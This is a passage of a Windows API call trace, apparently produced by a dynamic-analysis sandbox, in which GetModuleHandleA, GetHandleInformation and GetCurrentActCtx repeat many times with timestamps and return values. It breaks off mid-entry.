[0092.035] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.035] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.035] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.035] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.035] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.037] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.037] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.037] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.037] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.037] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.037] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.038] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.038] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.038] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.038] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.038] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.038] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.038] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.038] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.038] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.039] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.039] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.039] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.039] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.039] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.039] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.039] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.040] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.040] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.040] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.040] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.040] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.040] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.134] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.134] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.135] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.135] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.135] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.135] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.135] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.135] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.136] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.136] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.136] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.136] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.136] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.137] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.137] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.137] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.137] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.137] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.137] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.137] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.138] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.138] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.138] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.138] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.138] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.138] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.138] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.138] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.139] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.139] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.139] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.139] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.139] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.139] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.139] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.140] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.140] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.140] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.140] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.140] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.140] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.140] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.142] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.142] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.143] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.143] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.143] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.143] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.143] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.143] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.143] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.143] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.144] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.144] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.144] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.144] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.144] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.144] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.144] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.144] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.144] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.144] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.145] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.145] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.145] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.145] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.145] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.145] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.145] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.145] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.145] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.145] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.145] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.145] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.146] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.146] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.146] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.146] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.146] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.146] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.146] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.146] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.147] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.147] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.147] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.147] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.147] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.147] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.147] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.147] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.147] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.147] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.147] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.148] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.148] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.148] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.148] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.148] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.148] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.148] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.148] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.148] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.148] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.148] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.149] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.149] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.149] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.149] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.149] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.149] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.149] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.149] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.149] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.149] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.149] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.149] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.149] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.150] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.150] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.150] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.150] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.150] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.150] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.150] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.150] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.150] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.150] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.150] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.150] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.151] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.151] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.151] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.151] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.151] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.151] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.151] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.151] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.151] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.151] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.151] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.151] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.152] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.152] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.152] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.152] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.152] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.152] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.152] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.152] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.152] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.152] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.152] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.153] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.153] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.153] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.153] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.153] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.153] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.153] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.153] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.153] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.153] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.153] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.153] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.154] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.154] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.154] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.154] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.154] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.154] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.154] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.154] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.154] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.154] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.154] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.154] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.155] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.155] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.155] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.155] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.155] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.155] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.155] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.155] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.155] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.155] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.155] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.155] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.155] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.155] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.155] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.156] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.156] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.156] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.156] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.156] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.156] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.156] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.156] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.156] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.157] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.157] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.157] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.157] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.157] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.157] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.157] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.157] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.157] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.157] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.157] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.157] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.158] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.158] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.158] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.158] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.158] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.158] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.158] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.158] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.158] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.158] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.158] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.158] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.158] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.158] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.158] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.159] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.159] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.159] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.159] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.159] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.159] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.159] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.159] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.159] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.159] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.159] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.159] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.160] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.160] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.160] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.160] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.160] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.160] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.160] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.160] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.160] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.161] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.161] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.161] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.161] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.161] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.161] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.161] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.161] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.161] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.161] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.161] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.161] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.162] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.162] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.162] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.162] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.162] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.162] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.162] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.162] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.162] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.162] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.163] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.163] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.163] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.163] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.163] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.163] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.163] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.163] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.163] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.163] GetHandleInformation (in: 